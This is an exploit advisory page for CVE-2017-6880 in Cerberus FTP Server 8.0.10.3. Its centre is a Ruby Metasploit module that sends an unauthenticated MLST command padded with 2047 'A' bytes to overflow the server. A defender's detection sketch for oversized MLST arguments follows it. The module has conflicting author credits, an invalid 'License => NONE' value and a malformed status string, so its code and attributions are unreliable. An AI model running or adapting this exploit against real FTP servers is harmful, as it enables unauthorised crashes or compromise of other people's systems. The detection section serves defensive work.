Cerberus FTP Server 8.0.10.3 – 'MLST' Remote Buffer Overflow

2017.05.12
Risk: High
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/share/ruby
#[+] Title: Cerberus FTP Server 8.0.10.3 – 'MLST' Remote Buffer Overflow
#[+] Credits / Discovery: Nassim Asrir
#[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
#[+] Metasploit Module Author : Souhardya Sardar
#[+] Metasploit Module Author Contact: github.com/Souhardya | Souhardya.sardar@protonmail.com
#[+] Author Company: Henceforth
#[+] CVE: CVE-2017-6880

#Vendor:
#===============
#
#https://www.cerberusftp.com/

#Download:
#===========
#
#https://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)

#Vulnerability Type:
#===================
#
#Remote Buffer Overflow.

# ----------------------------
# Module Dependencies/requires
# ----------------------------

require 'msf/core'

# ----------------------------------
# Metasploit Class name and includes
# ----------------------------------

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Ftp

  # -----------------------------------------
  # Initialize information
  # -----------------------------------------

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Cerber FTP Remote Buffer Overflow ',
      'Description' => %q{
        This module exploits a buffer overflow in the Cerber FTP client that is triggered
        by sending a bad char "A" in the command "MLST" (2047) .
      },
      'Author'      =>
        [
          'Module Author And Bug Discovered by : Peter Baris',
          'Coded by : Souhardya Sardar (github.com/Souhardya)', #metasploit module :)
          'Thanks to : Nidhish Pandya ', #auditing:)
        ],
      'License'     => NONE,
      'Platform'    => ['win'],
      'References'  =>
        [
          [ 'CVE', 'CVE-2017-6880' ],
          # Reference code taken from original POC located here :-
          [ 'URL', 'https://www.exploit-db.com/exploits/41620/' ]
        ]))

    register_options(
      [
        OptPort.new('SRVPORT', [true, "The remote FTP server port", 21])
      ], self.class)
    deregister_options('FTPUSER', 'FTPPASS')
  end

  def exploit
    connect
    # 2047 filler bytes as the MLST argument
    payload = "A"*2047
    print_status("Trying to connect to target server {target.name...")
    # Double quotes so the command ends in a real CRLF
    sock.put('MLST ' + payload + "\r\n")
    handler
    disconnect
  end
end
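
For defenders, the trigger shown in the module (an MLST command with a 2047-byte argument, sent without logging in) is easy to recognise on the FTP control channel. The following detection sketch is an added example, not part of the advisory or the module; the 512-byte limit, the 64-byte run length, the function and field names, and the sample capture are assumptions constructed for illustration.

```ruby
# Added example: flag oversized MLST arguments in captured FTP client commands.
MAX_ARG_BYTES = 512 # assumed limit; tune to the longest path your server serves
Finding = Struct.new(:session, :index, :arg_len, :pre_auth, :filler)

# commands: array of [session_id, raw_client_line] pairs in capture order.
def scan_ftp_commands(commands, max_arg: MAX_ARG_BYTES)
  # Approximation: a session counts as logged in once the client has sent PASS
  # (server reply codes are not part of this input).
  pass_seen = Hash.new(false)
  findings = []
  commands.each_with_index do |(session, raw), index|
    line = raw.b.sub(/\r?\n\z/n, '')        # work on bytes, drop the line ending
    verb, arg = line.split(' ', 2)
    verb = verb.to_s.upcase
    arg = arg.to_s
    if verb == 'PASS'
      pass_seen[session] = true
    elsif verb == 'MLST' && arg.bytesize > max_arg
      # A run of 64+ identical bytes (assumed length) suggests padding, not a path.
      filler = arg.match?(/(.)\1{63,}/mn)
      findings << Finding.new(session, index, arg.bytesize, !pass_seen[session], filler)
    end
  end
  findings
end

# Constructed sample capture (not real traffic).
SAMPLE = [
  ['s1', "USER alice\r\n"],
  ['s1', "PASS example\r\n"],
  ['s1', "MLST /pub/readme.txt\r\n"],           # normal use
  ['s2', "MLST " + "A" * 2047 + "\r\n"],        # shape sent by the module above
  ['s3', "USER bob\r\n"],
  ['s3', "PASS example\r\n"],
  ['s3', "MLST " + "/dir" * 200 + "\r\n"]       # long but path-like, after login
].freeze

if __FILE__ == $PROGRAM_NAME
  scan_ftp_commands(SAMPLE).each do |f|
    puts "session=#{f.session} index=#{f.index} MLST arg=#{f.arg_len}B " \
         "pre_auth=#{f.pre_auth} filler=#{f.filler}"
  end
end
```

The same length check can be enforced inline by a proxy or IDS rule in front of an unpatched server until it is upgraded.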


Copyright 2018, cxsecurity.com